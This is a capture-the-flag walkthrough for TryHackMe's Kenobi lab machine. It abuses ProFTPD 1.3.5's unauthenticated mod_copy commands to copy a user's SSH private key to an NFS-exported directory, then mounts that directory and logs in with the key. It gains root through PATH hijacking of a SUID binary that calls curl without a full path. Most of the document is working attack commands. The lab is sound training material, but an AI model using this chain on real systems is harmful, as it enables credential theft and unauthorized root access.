Fast Learner’s writeup for TryHackMe.com’s Kenobi

1. ProFTP 1.3.5 vulnerable because:
The mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.
2. nc 1.2.3.4 21
3. SITE CPFR /home/kenobi/.ssh/id_rsa (Bizarre syntax, I know)
– Identifies file to be copied
4. SITE CPTO /var/tmp/id_rsa
– Copies file: 250 copy successful
5. Mount remote dir with NFS
mkdir /mnt/kenobiNFS
mount machine_ip:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
6. Copy id_rsa to local then ssh with it.
7. ssh -i id_rsa kenobi@1.2.3.4
$foothold
8. Find SUID files: find / -perm -u=s -type f 2>/dev/null
9. Reveals many SUID files, one of which is /usr/bin/menu
10. Do a $strings /usr/bin/menu, shows us:
curl -I localhost
uname -r
ifconfig
This shows us the binary is running without a full path (e.g. not using /usr/bin/curl or /usr/bin/uname).
As this file runs as the root users privileges, we can manipulate our to path to get root.
echo /bin/sh >curl
chmod +x curl
export PATH=/tmp:$PATH
/usr/bin/menu
Enter your choice: 1
#cat /root/root.txt to get the String for points